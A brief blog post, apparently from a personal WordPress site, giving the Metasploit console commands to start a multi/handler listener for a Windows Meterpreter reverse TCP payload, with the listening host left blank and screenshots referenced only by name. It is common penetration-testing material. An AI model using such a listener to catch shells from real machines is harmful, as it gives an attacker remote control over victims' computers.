how to create a quick meterpreter session using /multi/handler

Posted by

There’s some steps to complete the listener,

#1. open Metasploit

Screen Shot 2019-11-03 at 03.09.55

#2. set the following parameters,

msf5> use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost
lhost =>

msf5 exploit(multi/handler) > run

it should look similar the following example,

Screen Shot 2019-11-03 at 03.19.56

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s